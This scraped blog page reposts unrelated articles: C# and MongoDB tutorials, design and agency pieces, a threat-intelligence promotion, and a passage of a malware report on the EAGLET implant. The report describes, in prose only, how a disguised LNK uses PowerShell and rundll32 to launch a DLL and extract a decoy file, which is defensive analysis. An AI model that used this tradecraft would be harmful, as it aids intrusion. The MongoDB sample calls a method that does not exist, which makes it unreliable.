بلاگ

  • Designer Spotlight: Ivor Jian | Codrops

    Designer Spotlight: Ivor Jian | Codrops


    Hi! I’m Ivor Jian, a multidisciplinary designer and creative developer from Washington, USA. I create websites that blend Swiss-inspired precision with a clean, utilitarian style. My goal is to craft projects that evoke emotion through quality and tasteful animation.

    As my design career continues to develop, I’m constantly learning and expanding my horizons. Below are some projects I’m proud to share from the early stages of my creative journey.

    Featured projects

    Renz Ward

    A portfolio website for a UK-based designer who specializes in a technically forward aesthetic. From concept to completion, we collaborated on the visual direction, motion design, and intricate site details. The site features a grid-focused layout and animations that align with the designer’s visual identity.

    The biggest challenge was syncing the dial animation with the project scroll and indicator. I’m not ashamed to say I relied heavily on Perplexity to help with this interaction. The result is a technical yet sophisticated website that I’m proud to share. The site currently has limited content, as Renz is still wrapping up projects. I plan to submit it to CSSDA and Awwwards once it’s complete.

    Personal website

    My portfolio website is always a work in progress, but I’m happy to share its current iteration. I wanted the details and typography to reflect who I am, both personally and as a designer. This includes the typography, animations, and fine details throughout the site.

    PRJCT—Archi

    This is my first passion project, and it received an honorable mention on CSSDA. As a fan of interior design and architecture, I wanted to create a minimal and experimental website to explore interactions and showcase AI-generated architecture. My focus was to deliver a clear and refined experience with clean micro-interactions and smooth page transitions. The images were generated in Midjourney.

    I originally wanted to use real publications but was concerned about legal issues. The biggest challenge was making the individual showcases cohesive, as there is a lot of variation in the generated images. To achieve the best results, I used real publication images as references.

    Polestar

    A redesign concept of the Polestar brand. Their design language was right up my alley, so I took on the challenge of creating a bespoke web experience while staying aligned with their core visual identity.

    Visual explorations

    I enjoy exploring and creating random designs just for the sake of it. This helps me expand my horizons as a designer and can potentially lead to new opportunities.

    About me

    I’m a 22-year-old self-taught freelance designer and developer. I started doing graphic design at 13, which I believe gave me a strong foundation when I fully shifted to web design about two years ago. Without a formal education in building websites, I’ve had the freedom to explore ideas and learn by doing. This has helped me discover the kind of work I want to pursue and shape my design style. I started gaining some traction on X/Twitter after consistently posting my designs at the start of 2025, and I’ve met so many talented and wonderful people since beginning my journey there.

    My approach to design

    I don’t follow a strict set of principles or a fixed approach to design. I usually start by looking for inspiration before diving into a project. That said, I tend to favor a 12-column grid and clean, modern Swiss typefaces. I always iterate, exploring as many options as possible before choosing one direction to refine.

    Favorite tools

    My favorite tools are Webflow for development, GSAP for web animations, Perplexity for brainstorming and problem-solving, and Figma for design. This tool stack covers everything I need at the moment.

    Inspiration

    I love browsing beautiful visuals and websites to continually refine my taste. For design inspiration, my favorite resources are Savee and Searchsystem for their curated aesthetics of clean and technical design. When it comes to websites, I look to Awwwards and various agency sites with distinct, well-crafted brand identities. I also have favorite designers and developers whose work I admire and learn from by studying their craft; among them are Dennis Snellenberg, Ilja Van Eck, Oliver Larose, and Niklas Rosen.

    Future goals

    I want to keep learning and creating meaningful projects by collaborating with creative individuals and brands that align with my style of websites. I focus on combining clean typography with interactions that make a site shine with a modern and technical touch. I plan to become an award-winning designer and developer through persistence and a genuine love for great design.

    Final thoughts

    Thank you so much for reading about my thoughts and latest projects! I’m by no means a top-notch designer or developer yet, but I hope you enjoyed the visuals and got to know a bit about me. Consistently share your work—it might just change your life.

    Keep learning, exploring, and iterating. Feel free to reach out to me on X/Twitter if you want to chat or have a project in mind. ♥️



    Source link

  • 2 ways to check communication with MongoDB | Code4IT

    2 ways to check communication with MongoDB | Code4IT


    Health Checks are fundamental to keep track of the health of a system. How can we check if MongoDB is healthy?

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    In any complex system, you have to deal with external dependencies.

    More often than not, if one of the external systems (a database, another API, or an authentication provider) is down, the whole system might be affected.

    In this article, we’re going to learn what Health Checks are, how to create custom ones, and how to check whether a MongoDB instance can be reached or not.

    What are Health Checks?

    A Health Check is a special type of HTTP endpoint that allows you to understand the status of the system – well, it’s a check on the health of the whole system, including external dependencies.

    You can use it to understand whether the application itself and all of its dependencies are healthy and responding in a reasonable amount of time.

    Those endpoints are also useful for humans, but are even more useful for tools that monitor the application and can automatically fix some issues if occurring – for example, they can restart the application if it’s in a degraded status.

    How to add Health Checks in dotNET

    Lucky for us, .NET already comes with Health Check capabilities, so we can just follow the existing standard without reinventing the wheel.

    For the sake of this article, I created a simple .NET API application.

    Head to the Program class – or, in general, wherever you configure the application – and add this line:

    builder.Services.AddHealthChecks();
    

    and then, after var app = builder.Build();, you must add the following line to have the health checks displayed under the /healtz path.

    app.MapHealthChecks("/healthz");
    

    To sum up, the minimal structure should be:

    var builder = WebApplication.CreateBuilder(args);
    
    builder.Services.AddControllers();
    
    builder.Services.AddHealthChecks();
    
    var app = builder.Build();
    
    app.MapHealthChecks("/healthz");
    
    app.MapControllers();
    
    app.Run();
    

    So that, if you run the application and navigate to /healthz, you’ll just see an almost empty page with two characteristics:

    • the status code is 200;
    • the only printed result is Healthy

    Clearly, that’s not enough for us.

    How to create a custom Health Check class in .NET

    Every project has its own dependencies and requirements. We should be able to build custom Health Checks and add them to our endpoint.

    It’s just a matter of creating a new class that implements IHealthCheck, an interface that lives under the Microsoft.Extensions.Diagnostics.HealthChecks namespace.

    Then, you have to implement the method that tells us whether the system under test is healthy or degraded:

    Task<HealthCheckResult> CheckHealthAsync(HealthCheckContext context, CancellationToken cancellationToken = default);
    

    The method returns an HealthCheckResult, which is a struct that can have those values:

    • Healthy: everything is OK;
    • Degraded: the application is running, but it’s taking too long to respond;
    • Unhealthy: the application is offline, or an error occurred while performing the check.

    So, for example, we build a custom Health Check class such as:

    public class MyCustomHealthCheck : IHealthCheck
    {
        private readonly IExternalDependency _dependency;
    
        public MyCustomHealthCheck(IExternalDependency dependency)
        {
            _dependency = dependency;
        }
    
        public Task<HealthCheckResult> CheckHealthAsync(
            HealthCheckContext context, CancellationToken cancellationToken = default)
        {
            var isHealthy = _dependency.IsHealthy();
    
            if (isHealthy)
            {
                return Task.FromResult(HealthCheckResult.Healthy());
            }
            return Task.FromResult(HealthCheckResult.Unhealthy());
        }
    }
    

    And, finally, add it to the Startup class:

    builder.Services.AddHealthChecks()
        .AddCheck<MyCustomHealthCheck>("A custom name");
    

    Now, you can create a stub class that implements IExternalDependency to toy with the different result types. In fact, if we create and inject a stub class like this:

    public class StubExternalDependency : IExternalDependency
    {
        public bool IsHealthy() => false;
    }
    

    and we run the application, we can see that the final result of the application is Unhealthy.

    A question for you: why should we specify a name to health checks, such as “A custom name”? Drop a comment below 📩

    Adding a custom Health Check Provider for MongoDB

    Now we can create a custom Health Check for MongoDB.

    Of course, we will need to use a library to access Mongo: so simply install via NuGet the package MongoDB.Driver – we’ve already used this library in a previous article.

    Then, you can create a class like this:

    public class MongoCustomHealthCheck : IHealthCheck
    {
        private readonly IConfiguration _configurations;
        private readonly ILogger<MongoCustomHealthCheck> _logger;
    
        public MongoCustomHealthCheck(IConfiguration configurations, ILogger<MongoCustomHealthCheck> logger)
        {
            _configurations = configurations;
            _logger = logger;
        }
    
        public async Task<HealthCheckResult> CheckHealthAsync(
            HealthCheckContext context, CancellationToken cancellationToken = default)
        {
            try
            {
                await MongoCheck();
                return HealthCheckResult.Healthy();
            }
            catch (Exception ex)
            {
                return HealthCheckResult.Unhealthy();
            }
        }
    
        private async Task IsMongoHealthy()
        {
            string connectionString = _configurations.GetConnectionString("MongoDB");
            MongoUrl url = new MongoUrl(connectionString);
    
            IMongoDatabase dbInstance = new MongoClient(url)
                .GetDatabase(url.DatabaseName)
                .WithReadPreference(new ReadPreference(ReadPreferenceMode.Secondary));
    
            _ = await dbInstance.RunCommandAsync<BsonDocument>(new BsonDocument { { "ping", 1 } });
        }
    }
    

    As you can see, it’s nothing more than a generic class with some services injected into the constructor.

    The key part is the IsMongoHealthy method: it’s here that we access the DB instance. Let’s have a closer look at it.

    How to Ping a MongoDB instance

    Here’s again the IsMongoHealthy method.

    string connectionString = _configurations.GetConnectionString("MongoDB");
    MongoUrl url = new MongoUrl(connectionString);
    
    IMongoDatabase dbInstance = new MongoClient(url)
        .GetDatabase(url.DatabaseName)
        .WithReadPreference(new ReadPreference(ReadPreferenceMode.Secondary));
    
    _ = await dbInstance.RunCommandAsync<BsonDocument>(new BsonDocument { { "ping", 1 } });
    

    Clearly, we create a reference to a specific DB instance: new MongoClient(url).GetDatabase(url.DatabaseName). Notice that we’re requiring access to the Secondary node, to avoid performing operations on the Primary node.

    Then, we send the PING command: dbInstance.RunCommandAsync<BsonDocument>(new BsonDocument { { "ping", 1 } }).

    Now what? The PING command either returns an object like this:

    or, if the command cannot be executed, it throws a System.TimeoutException.

    MongoDB Health Checks with AspNetCore.Diagnostics.HealthChecks

    If we don’t want to write such things on our own, we can rely on pre-existing libraries.

    AspNetCore.Diagnostics.HealthChecks is a library you can find on GitHub that automatically handles several types of Health Checks for .NET applications.

    Note that this library is NOT maintained or supported by Microsoft – but it’s featured in the official .NET documentation.

    This library exposes several NuGet packages for tens of different dependencies you might want to consider in your Health Checks. For example, we have Azure.IoTHub, CosmosDb, Elasticsearch, Gremlin, SendGrid, and many more.

    Obviously, we’re gonna use the one for MongoDB. It’s quite easy.

    First, you have to install the AspNetCore.HealthChecks.MongoDb NuGet package.

    NuGet package for AspNetCore.HealthChecks.MongoDb

    Then, you have to just add a line of code to the initial setup:

    builder.Services.AddHealthChecks()
        .AddMongoDb(mongodbConnectionString: builder.Configuration.GetConnectionString("MongoDB"))
    

    That’s it! Neat and easy! 😎

    Why do we even want a custom provider?

    Ok, if we can just add a line of code instead of creating a brand-new class, why should we bother creating the whole custom class?

    There are some reasons to create a custom provider:

    1. You want more control over the DB access: for example, you want to ping only Secondary nodes, as we did before;
    2. You don’t just want to check if the DB is up, but also the performance of doing some specific operations, such as retrieving all the documents from a specified collection.

    But, yes, in general, you can simply use the NuGet package we used in the previous section, and you’re good to go.

    Further readings

    As usual, the best way to learn more about a topic is by reading the official documentation:

    🔗 Health checks in ASP.NET Core | Microsoft Docs

    How can you use MongoDB locally? Well, easy: with Docker!

    🔗 First steps with Docker: download and run MongoDB locally | Code4IT

    As we saw, we can perform PING operation on a MongoDB instance.

    🔗 Ping command | MongoDB

    This article first appeared on Code4IT 🐧

    Finally, here’s the link to the GitHub repo with the list of Health Checks:

    🔗 AspNetCore.Diagnostics.HealthChecks | GitHub

    and, if you want to sneak peek at the MongoDB implementation, you can read the code here:

    🔗 MongoDbHealthCheck.cs | GitHub

    Wrapping up

    In this article, we’ve learned two ways to implement Health Checks for a MongoDB connection.

    You can either use a pre-existing NuGet package, or you can write a custom one on your own. It all depends on your use cases.

    I hope you enjoyed this article! Let’s keep in touch on Twitter or LinkedIn, if you want! 🤜🤛

    Happy coding!

    🐧





    Source link

  • Why Threat Intelligence is the Missing Link in Your Cybersecurity Strategy

    Why Threat Intelligence is the Missing Link in Your Cybersecurity Strategy


    In the ever-evolving landscape of cyber threats, organizations are no longer asking if they’ll be targeted but when. Traditional cybersecurity measures, such as firewalls, antivirus software, and access control, remain essential. But they’re often reactive, responding only after a threat has emerged. In contrast, threat intelligence enables organizations to get ahead of the curve by proactively identifying and preparing for risks before they strike.

    What is Threat Intelligence?

    At its core, threat intelligence is the process of gathering, analyzing, and applying information about existing and potential attacks. This includes data on threat actors, tactics and techniques, malware variants, phishing infrastructure, and known vulnerabilities.

    The value of threat intelligence lies not just in raw data, but in its context—how relevant it is to your environment, and how quickly you can act on it.

    Why Organizations Need Threat Intelligence

    1. Cyber Threats Are Evolving Rapidly

    New ransomware variants, phishing techniques, and zero-day vulnerabilities emerge daily. Threat intelligence helps organizations stay informed about these developments in real time, allowing them to adjust their defenses accordingly.

    1. Contextual Awareness Improves Response

    When a security event occurs, knowing whether it’s a one-off anomaly or part of a broader attack campaign is crucial. Threat intelligence provides this clarity, helping teams prioritize incidents that pose real risk over false alarms.

    1. It Powers Proactive Defense

    With actionable intelligence, organizations can proactively patch vulnerabilities, block malicious domains, and tighten controls on specific threat vectors—preventing breaches before they occur.

    1. Supports Compliance and Risk Management

    Many data protection regulations require businesses to demonstrate risk-based security practices. Threat intelligence can support compliance with frameworks like ISO 27001, GDPR, and India’s DPDP Act by providing documented risk assessments and preventive actions.

    1. Essential for Incident Detection and Response

    Modern SIEMs, SOAR platforms, and XDR solutions rely heavily on enriched threat feeds to detect threats early and respond faster. Without real-time intelligence, these systems are less effective and may overlook critical indicators of compromise.

    Types of Threat Intelligence

    • Strategic Intelligence: High-level trends and risks to inform business decisions.
    • Tactical Intelligence: Insights into attacker tools, techniques, and procedures (TTPs).
    • Operational Intelligence: Real-time data on active threats, attack infrastructure, and malware campaigns.
    • Technical Intelligence: Specific IOCs (indicators of compromise) like IP addresses, hashes, or malicious URLs.

    Each type plays a unique role in creating a layered defense posture.

    Challenges in Implementing Threat Intelligence

    Despite its benefits, threat intelligence can be overwhelming. The sheer volume of data, lack of context, and integration issues often dilute its impact. To be effective, organizations need:

    • Curated, relevant intelligence feeds
    • Automated ingestion into security tools
    • Clear mapping to business assets and risks
    • Skilled analysts to interpret and act on the data

     The Way Forward: Intelligence-Led Security

    Security teams must shift from passive monitoring to intelligence-led security operations. This means treating threat intelligence as a core input for every security decision, such as prioritizing vulnerabilities, hardening cloud environments, or responding to an incident.

    In a world where attackers collaborate, automate, and innovate, defenders need every edge. Threat intelligence provides that edge.

    Ready to Build an Intelligence-Driven Defense?

    Seqrite Threat Intelligence helps enterprises gain real-time visibility into global and India—specific emerging threats. Backed by over 10 million endpoint signals and advanced malware analysis, it’s designed to supercharge your SOC, SIEM, or XDR. Explore Seqrite Threat Intelligence to strengthen your cybersecurity strategy.



    Source link

  • Reform Collective: A New Website, Designed to Be Seen

    Reform Collective: A New Website, Designed to Be Seen



    Reform Collective is a digital-first, full-service design and development agency. We’ve been partnering with clients of all sizes for 11 years and going strong! We work with ambitious teams building interesting things. If it doesn’t clash with our ethics and you respect our time, we’re in.

    Design

    Our previous site was no longer working for us. It didn’t reflect the kind of work we were doing, and more importantly, it created friction. The navigation was convoluted, the structure too deep, and the visual style didn’t align with what we were showing clients in proposals or conversations. We’d share a project we were proud of, and when people landed on the site, they either got confused trying to find it or lost interest navigating a dated UX. It was time to move on.

    The redesign was a reset. We stripped the site down to the essentials. Clean layout. Wide spacing. Minimal structure. The goal was to create something that felt open, confident, and easy to move through. We wanted the experience to reflect how we approach client work: intentional, clear, and results-focused — all while telling a strong story.

    We also made a conscious decision to pull back on animation. While we still use motion to support interaction, we didn’t want it to take over the experience. Performance and clarity came first.

    Sharing Our Work

    One of the most deliberate changes we made was how we present our work. Traditional case studies are saturated with summaries, timelines, and process write-ups. We realized that’s not how people consume portfolio content anymore. They don’t read. They scroll. They skim. They decide quickly if you’re worth their time.

    So we stopped writing to be read and started designing to be seen.

    We removed all the fluff: no intro copy, no strategy breakdowns, no “here’s what we learned.” Just clean visuals, concise project titles, and frictionless browsing. If the work can’t speak for itself, it probably isn’t strong enough to be featured.

    This shift wasn’t just aesthetic. It was a strategic choice. We wanted to reduce noise and let the quality of the output stand on its own. The site isn’t there to sell. It’s there to show. And showing means getting people to the work faster, without distractions.

    The end result is a portfolio that feels fast, direct, and unapologetically visual. No click tunnels. No over-explaining. Just a clear runway to the work.

    The Navigation

    We designed the global menu to feel structural. Instead of floating over the site or fading in as a layer, it pushes the entire layout downward, physically moving the page to make room. It’s a deliberate gesture. Spatial, not just visual.

    The motion is clean and architectural: a full-width panel slides down from the top, snapping into place with precision. There’s no blur, no parallax, no visual fluff. Just sharp contrast, bold typography, and three primary paths: Our Work, About Us, and Reform Nova. These are anchored by lean sub-labels and a strong call to action.

    This isn’t a nav trying to show off. It’s built to orient you quickly, frame the experience, and get out of the way. The choice to displace the page content rather than obscure it reinforces how we think about experience design: create clarity by introducing hierarchy, not noise.

    It feels tactile. It feels intentional. And it reflects how we build: structural logic, tight motion, and a clear sense of priority.

    The Nerdy Tech Details from Our Lead Engineer

    Webby Award Section

    I started with an AI prototype in v0 for the wavy lines background. v0 is surprisingly good at interpreting vague instructions. I can literally tell it “make it goopier” and it will spit out code that makes things feel goopier. I ended up with a pretty snazzy prototype. Because it used react-three-fiber, I could basically copy-paste it directly into our code, install dependencies, and be 80% done! Much faster and more interesting than setting up a Three.js scene by hand, in my opinion.

    I will say this workflow has its quirks, though. The AI is great at the initial vibe check, but it chokes on specific feedback. It’s pretty hard to describe visual bugs in text, and since the model can’t see the output, it’s basically guessing most of the time. I also noticed it tends to “over-edit,” sometimes refactoring an entire component for a tiny change. I ended up fixing several bugs myself because v0 just couldn’t handle them.

    The next part was the mouse follower. I wanted a video that follows the cursor, appearing over the wavy background but under the header text. As it passes behind the text, the text’s color inverts so it remains visible.

    The “following the mouse” part was easy! The inversion effect was a bit trickier. My first thought was to use mix-blend-mode paired with backdrop-filter. It seemed like a great idea and should have worked perfectly—or at least, that’s what I’d say if it actually had. I ended up trying all kinds of random approaches to find something that worked across every browser. Major upside: I got to justify all my monitors by putting a different browser on each while coding.

    The breakthrough came when I stopped trying to make one element do everything. I split the effect into two perfectly synchronized divs:

    1. The <Inverter>: A ghost div with no content. Its only job is to carry the backdrop-filter: invert(1) that flips the text color.
    2. The <Video>: This holds the actual video. It’s placed in a lower stacking context using z-index: -1, so it slides beneath the text but stays above the page background.

    I used GSAP’s quickTo to animate them both in sync. To the user (that’s YOU), it appears as a single element. It feels like a bit of a hack, but it works flawlessly across all browsers.

    Here’s the gist of it:

    // animate both refs at the same time so they appear as one element
    const moveX = gsap.quickTo([videoRef.current, inverter.current], "x", { /* ... */ });
    const moveY = gsap.quickTo([videoRef.current, inverter.current], "y", { /* ... */ });
    
    // in the JSX
    <Wrapper>
        {/* other content here, ofc */}
        <Video ref={videoRef} {...video?.data} />
        <Inverter ref={inverter} />
    </Wrapper>
    
    // and the styles...
    const Video = styled(BackgroundVideo, {
        position: "fixed",
        zIndex: -1, // pushed behind the text
        filter: "invert(1) contrast(0.5)",
        /* ... */
    });
    
    const Inverter = styled("div", {
        position: "fixed",
        pointerEvents: "none", // for text selection
        backdropFilter: "invert(1) contrast(2)",
        /* ... */
    });

    The styles here use https://www.restyle.dev/, by the way — it’s a runtime-only CSS library (i.e., no bundler config required), which is pretty cool.

    Nova Blocks Section

    This feature is a scroll-driven animation where a grid of 3D blocks zooms past the camera. The fun part is that it’s all done with pure CSS transforms—no WebGL or threejs needed.

    The setup involves a container with perspective and a bunch of “block” divs, each using transform-style: preserve-3d. Each block contains several child divs rotated into place to form a cube. For performance, I only animate the parent block’s transform, which is more efficient than moving hundreds of individual faces. I used the MDN demo cube for inspiration on this one.

    Of course, doing this led me straight into the weird world of browser bugs. (I seem to end up there a lot…)

    1. Safari’s Rendering Glitch:

    Safari was z-fighting like crazy. It would randomly render faces that should have been occluded by an adjacent cube, which looked terrible. See web-bugs/issues/155416. The fix ended up being twofold:

    • Manual Culling: As an optimization, I was already rendering only the faces that would be visible based on the cube’s grid quadrant. This is basically manual back-face culling, which helped reduce the number of layers Safari had to compute. It probably improves performance anyway, so… thanks, Safari, I guess.
    • Forced Stacking: I’m assigning each cube a specific z-index based on its row and column. It feels a bit brute-force, but it tells Safari exactly how to stack things—and it completely eliminated the flicker.

    Here’s the gist of the Block.tsx component:

    export default function Block({
      vertical,
      horizontal,
      row,
      column,
    }: {
      // vertical/horizontal basically represents the 'quadrant' on-screen
      vertical: "top" | "bottom";
      horizontal: "left" | "right";
      row: number;
      column: number;
    }) {
      // Explicitly set z-index based on grid position to prevent z-fighting in Safari
      // This was basically trial and error to figure out
      const style =
        vertical === "top" && horizontal === "left"
          ? { zIndex: -row - column }
          : vertical === "bottom" && horizontal === "right"
            ? { zIndex: -1 }
            : horizontal === "left"
              ? { zIndex: -column }
              : { zIndex: -row };
    
      // Conditionally render only the necessary faces
      return (
        
          {horizontal === "left" && }
          {horizontal === "right" && }
          {vertical === "top" && }
          {vertical === "bottom" && }
        
      );
    }
    
    const Wrapper = styled("div", {
      transformStyle: "preserve-3d", // the magic property for the cube
      /* ... */
    });
    

    2. Firefox’s Pinning Problem

    Our site uses CSS Subgrid for global alignment, which is awesome in my opinion because it narrows the gap between design and development. If something in the design is aligned to the grid, it can now be literally aligned to the grid in the code too.

    Caveat: I found that in Firefox, position: sticky was completely broken inside a subgrid container. A pinned element would start pinning but never unpin, because its positioning context was being resolved to the wrong grid container.

    After I isolated it in a CodePen and reported the bug (web-bugs/issues/152027), the fix was simply to remove subgrid from the sticky element’s parent and apply the grid styles directly.

    Running into weird bugs is frustrating, but it’s part of the deal when you’re building cool things. You just have to plan for it in your timeline. And if you find a bug in some strange edge case, I’m a big advocate for taking the time to create a minimal test case and report it. It helps pinpoint exactly what’s going wrong, which leads to a better solution—and it helps make the web better for everyone.

    Thanks for reading!

    Ready to build something with us? We’re always looking for great companies and individuals to partner with on new projects. Get started →

    The Reform Co. Team

    P.S. We’re also hiring, feel free to check out our careers page. ❤️



    Source link

  • Access items from the end of the array using the ^ operator &vert; Code4IT

    Access items from the end of the array using the ^ operator | Code4IT


    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    Say that you have an array of N items and you need to access an element counting from the end of the collection.

    Usually, we tend to use the Length property of the array, and then subtract the number corresponding to the position we want to reach:

    string[] values = {
        "alfa",
        "bravo",
        "charlie",
        "delta",
        "echo",
        "foxtrot",
        "golf"
    };
    
    var echo = values[values.Length - 3];
    

    As you can see, we are accessing the same variable twice in a row: values[values.Length - 3].

    We can simplify that specific line of code by using the ^ operator:

    string[] values = {
        "alfa",
        "bravo",
        "charlie",
        "delta",
        "echo",
        "foxtrot",
        "golf"
    };
    
    var echo = values[^3];
    

    Yes, that’s just syntactic sugar, but it can help make your code more readable. In fact, if you have a look at the IL code generated by both examples, they are perfectly identical. IL is quite difficult to read and understand, but you can acknowledge that both syntaxes are equivalent by looking at the decompiled C# code:

    C# decompiled code

    Performance is not affected by this operator, so it’s just a matter of readability.

    Clearly, you still have to take care of array bounds – if you access values[^55] you’ll get an IndexOutOfRangeException.

    Pay attention that the position is 1-based!

    string[] values = {
        "alfa",
        "bravo",
        "charlie",
        "delta",
        "echo",
        "foxtrot",
        "golf"
    };
    
    Console.WriteLine(values[^1]); //golf
    Console.WriteLine(values[^0]); //IndexOutOfRangeException
    

    Further readings

    Using ^ is a nice trick that many C# developers don’t know. There are some special characters that can help us but are often not used. Like the @ operator!

    🔗 C# Tip: use the @ prefix when a name is reserved

    This article first appeared on Code4IT 🐧

    Wrapping up

    In this article, we’ve learned that just using the right syntax can make our code much more readable.

    But we also learned that not every new addition in the language brings performance improvements to the table.

    I hope you enjoyed this article! Let’s keep in touch on Twitter or on LinkedIn, if you want! 🤜🤛

    Happy coding!

    🐧





    Source link

  • Format Interpolated Strings &vert; Code4IT

    Format Interpolated Strings | Code4IT


    Interpolated strings are those built with the $ symbol, that you can use to create strings using existing variables or properties. Did you know that you can apply custom formattings to such values?

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    As you know, there are many ways to “create” strings in C#. You can use a StringBuilder, you can simply concatenate strings, or you can use interpolated strings.

    Interpolated? WHAT? I’m pretty sure that you’ve already used interpolated strings, even if you did not know the “official” name:

    int age = 31;
    string bio = $"Hi, I'm {age} years old";
    

    That’s it: an interpolated string is one where you can reference a variable or a property within the string definition, using the $ and the {} operators to generate such strings.

    Did you know that you can even format how the interpolated value must be rendered when creating the string? It’s just a matter of specifying the format after the : sign:

    Formatting dates

    The easiest way to learn it is by formatting dates:

    DateTime date = new DateTime(2021,05,23);
    
    Console.WriteLine($"The printed date is {date:yyyy-MM-dd}"); //The printed date is 2021-05-23
    Console.WriteLine($"Another version is {date:yyyy-MMMM-dd}"); //Another version is 2021-May-23
    
    Console.WriteLine($"The default version is {date}"); //The default version is 23/05/2021 00:00:00
    

    Here we have date:yyyy-MM-dd which basically means “format the date variable using the yyyy-MM-dd format”.

    There are, obviously, different ways to format dates, as described on the official documentation. Some of the most useful are:

    • dd: day of the month, in number (from 01 to 31);
    • ddd: abbreviated day name (eg: Mon)
    • dddd: complete day name (eg: Monday)
    • hh: hour in a 12-hour clock (01-> 12)
    • HH: hour in a 24-hour clock (00->23)
    • MMMM: full month day

    and so on.

    Formatting numbers

    Similar to dates, we can format numbers.

    For example, we can format a double number as currency or as a percentage:

    var cost = 12.41;
    Console.WriteLine($"The cost is {cost:C}"); // The cost is £12.41
    
    var variation = -0.254;
    Console.WriteLine($"There is a variation of {variation:P}"); //There is a variation of -25.40%
    

    Again, there are lots of different ways to format numbers:

    • C: currency – it takes the current culture, so it may be Euro, Yen, or whatever currency, depending on the process’ culture;
    • E: exponential number, used for scientific operations
    • P: percentage: as we’ve seen before {1:P} represents 100%;
    • X: hexadecimal

    Further readings

    There are too many formats that you can use to convert a value to a string, and we cannot explore all of them here.

    But still, you can have a look at several ways to format date and time in C#

    🔗 Custom date and time format strings | Microsoft Docs

    and, obviously, to format numbers

    🔗 Standard numeric format strings | Microsoft Docs

    This article first appeared on Code4IT 🐧

    Finally, remember that interpolated strings are not the only way to build strings upon variables; you can (and should!) use string.Format:

    🔗 How to use String.Format – and why you should care about it | Code4IT

    Wrapping up

    I hope you enjoyed this article! Let’s keep in touch on Twitter or on LinkedIn, if you want! 🤜🤛

    Happy coding!

    🐧





    Source link

  • Ung0901 Targets Russian Aerospace Defense Using Eaglet Implant

    Ung0901 Targets Russian Aerospace Defense Using Eaglet Implant


    Contents

    • Introduction
    • Initial Findings
    • Infection Chain.
    • Technical Analysis
      • Stage 0 – Malicious Email File.
      • Stage 1 – Malicious LNK file.
      • Stage 2 – Looking into the decoy file.
      • Stage 3 – Malicious EAGLET implant.
    • Hunting and Infrastructure.
      • Infrastructural details.
      • Similar campaigns.
    • Attribution
    • Conclusion
    • SEQRITE Protection.
    • IOCs
    • MITRE ATT&CK.

    Introduction

    SEQRITE Labs APT-Team has recently found a campaign, which has been targeting Russian Aerospace Industry. The campaign is aimed at targeting employees of Voronezh Aircraft Production Association (VASO), one of the major aircraft production entities in Russia via using товарно-транспортная накладная (TTN) documents — critical to Russian logistics operations. The entire malware ecosystem involved in this campaign is based on usage of malicious LNK file EAGLET DLL implant, further executing malicious commands and exfiltration of data.

    In this blog, we will explore the technical details of the campaign. we encountered during our analysis. We will examine the various stages of this campaign, starting from deep dive into the initial infection chain to implant used in this campaign, ending with a final overview covering the campaign.

    Initial Findings

    Recently, on 27th of June, our team upon hunting malicious spear-phishing attachments, found a malicious email file, which surfaced on sources like VirusTotal, upon further hunting, we also found a malicious LNK file, which was responsible for execution of the malicious DLL-attachment whose file-type has been masquerading as ZIP-attachment.

    Upon looking into the email, we found the file Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip which translates to Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip is basically a DLL file and upon further hunting, we found another file which is a shortcut [LNK] file, having the same name. Then, we decided to look into the workings of these files.

    Infection Chain

     

    Technical Analysis

    We will break down the analysis of this campaign into three different parts, starting with looking into the malicious EML file, followed by the attachment I.e., the malicious DLL implant and the LNK file.

    Stage 0 – Malicious Email File.

    Well, initially, we found a malicious e-mail file, named as backup-message-10.2.2.20_9045-800282.eml , uploaded from Russian-Federation. Upon, looking into the specifics of the e-mail file.

    We found that the email was sent to an employee at Voronezh Aircraft Production Association (VASO), from Transport and Logistics Centre regarding a Delivery note.

    Looking in the contents of the email, we found that the message was crafted to deliver the news of recent logistics movement, also referencing a consignment note (Товарно-транспортная накладная №391-44 от 26.06.2025), the email content also urges the receiver to prepare for the delivery of a certain cargo in 2-3 days. As, we already noticed that the threat actor impersonates an individual, we also noticed that there is a malicious attachment, masquerading as ZIP file. Upon downloading, we figured out that it was a malicious DLL implant.

    Apart, from the malicious DLL implant, we also hunted a malicious LNK file, with the same name, we believe has been dropped by another spear-phishing attachment, which is used to execute this DLL implant, which we have termed as EAGLET.

    In the next section, we will look into the malicious LNK file.

    Stage 1 – Malicious LNK File.

    Upon, looking inside the LNK file, we found that it is performing some specific set of tasks which finally executes the malicious DLL file and also spawns a decoy pop-up on the screen. It does this by following manner.

    Initially, it uses powershell.exe binary to run this script in background, which enumerates the masquerading ZIP file, which is the malicious EAGLET implant, then in-case it finds the malicious implant, it executes it via rundll32.exe LOLBIN, else in-case it fails to find it recursively looks for the file under %USERPROFILE% and in-case it finds, it runs it, then, if it fails to find it in that location, it looks tries to look under %TEMP% location.

    Once it has found the DLL implant, it is executed and then extracts a decoy XLS file embedded within the implant, which is performed by reading the XLS file of 59904 bytes which is stored just after the starting 296960 bytes, which is then written under %TEMP% directory with named ранспортная_накладная_ТТН_№391-44_от_26.06.2025.xls. This is the purpose of the malicious LNK file, in the next section, we will look into the decoy file.

    Stage 2- Looking into the decoy file.

    In this section, we will look into the XLS decoy file, which has been extracted from the DLL implant.

    Initially, we identified that the referenced .XLS file is associated with a sanctioned Russian entity, Obltransterminal LLC (ООО “Облтранстерминал”), which appears on the U.S. Department of the Treasury’s OFAC SDN (Specially Designated Nationals) list. The organization has been sanctioned under Executive Order 14024 for its involvement in Russia’s military-logistics infrastructure.

